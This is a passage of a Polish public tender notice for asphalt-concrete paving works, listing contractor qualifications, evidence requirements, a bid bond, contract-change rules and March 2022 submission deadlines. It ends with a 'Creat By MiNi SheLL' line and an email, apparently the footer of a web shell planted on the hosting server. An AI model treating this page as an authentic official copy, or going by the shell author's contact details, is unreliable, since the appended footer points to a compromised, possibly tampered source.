stawia warunków w tym zakresie<br/>3) Sytuacji ekonomicznej lub finansowej - Zamawiający nie stawia warunków w tym zakresie.<br/>4) Zdolności technicznej lub zawodowej,<br/>a) w zakresie zdolności technicznej – warunek zostanie spełniony, jeżeli Wykonawca wykaże, że<br/>dysponuje, lub będzie dysponował osobami zdolnymi do sprawowania samodzielnych funkcji<br/>technicznych w budownictwie w zakresie kierowania robotami budowlanymi, tj.:<br/>􀀀 kierownikiem budowy – posiadającym:<br/> ważne na dzień składania ofert uprawnienia budowlane do kierowania robotami budowlanymi<br/>zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020 poz. poz.1333) lub<br/>odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów, uprawniające do kierowania robotami budowlanymi w zakresie<br/>wynikającym z przedmiotu niniejszego zamówienia, wg zał. nr 8 do SWZ<br/>Wskazany wyżej wykaz personelu Wykonawcy stanowi jedynie minimalne wymagania dla<br/>spełnienia warunku udziału w postępowaniu.<br/>b) na potwierdzenie zdolności zawodowej Zamawiający wymaga, aby Wykonawcy wykazali, że<br/>w okresie 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności<br/>jest krótszy – w tym okresie, wykonali, co najmniej 1 robotę budowlaną, których przedmiotem<br/>były roboty budowlane polegające na - wykonaniu nawierzchni z betonu asfaltowego na<br/>powierzchni min. 3000 m2 z tolerancją na poziomie minus 10%. - oraz załączy dowody<br/>potwierdzające, że ww. roboty zostały wykonane należycie, w szczególności, że zostały<br/>wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Wykaz robót budowlanych i dowody określające, czy te roboty<br/>budowlane zostały wykonane należycie<br/>2) Wykaz osób</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie wykonawcy zgodnie z art. 125 ust.1 ustawy o braku podstaw do wykluczenia z<br/>postępowania na podstawie przesłanek określonych w art. 108 ust. 1 Ustawy (wzór druku załącznik nr<br/>2 do SWZ)</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 30000.00zł. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku podmiotów występujących wspólnie oświadczenie z art 125 ust 1 składa każdy<br/>wykonawca w zakresie w jakim wykazuje spełnienie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> .Zamawiający przewiduje możliwość dokonania zmian w umowie na zasadach określonych w<br/>projekcie umowy stanowiącym załącznik nr 9 do SWZ<br/>1. Zmiana niniejszej umowy jest możliwa w przypadku:<br/>a) zmiany terminu wykonania usługi z przyczyn niezależnych od Wykonawcy,<br/>b) ustawowej zmiany stawki podatku VAT, poprzez dostosowanie stawki podatku VAT do<br/>obowiązujących przepisów prawa, wartość netto pozostaje bez zmian.<br/>c) zmiany osób upoważnionych do realizacji umowy.<br/>2. Zmiana niniejszej umowy jest możliwa jeżeli łączna wartość zmian jest mniejsza niż progi<br/>unijne.<br/>3. Zmiana niniejszej umowy wymaga formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-17 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com